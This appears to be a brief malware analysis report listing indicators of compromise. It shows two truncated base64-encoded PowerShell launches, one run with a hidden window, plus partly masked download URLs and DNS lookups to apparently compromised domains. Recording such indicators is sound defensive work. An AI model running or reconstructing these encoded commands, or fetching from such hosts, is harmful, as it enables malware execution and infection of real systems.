Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AMQA5ADUAMgA0ADQAPQAnAHIAMQA5ADUAXwA2ACcAOwAkAEEANgBfADUANgA1ADYAIAA9ACAAJwA0ADkAOAAnADsAJABKADYAOAA1ADYAMgA5ADAAPQAnAFgAMAA2ADEANwA4ADgAJwA7ACQAWQAxADYANAAxADgAPQAkAGUAbgB2ADoAd...
- http://ds###coa.com/css/ptk903/
- http://co#####lingmassage.com/wp-admin/ufbyw973/
- http://de####icihatasi.com/gecmis/or116/
- DNS ASK ba####hinhphap.com
- DNS ASK ds###coa.com
- DNS ASK co#####lingmassage.com
- DNS ASK de####icihatasi.com
- DNS ASK nh###nhvina.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AMQA5ADUAMgA0ADQAPQAnAHIAMQA5ADUAXwA2ACcAOwAkAEEANgBfADUANgA1ADYAIAA9ACAAJwA0ADkAOAAnADsAJABKADYAOAA1ADYAMgA5ADAAPQAnAFgAMAA2ADEANwA4ADgAJwA7ACQAWQAxADYANAAxADgAPQAkAGUAbgB2ADoAd...' (with hidden window)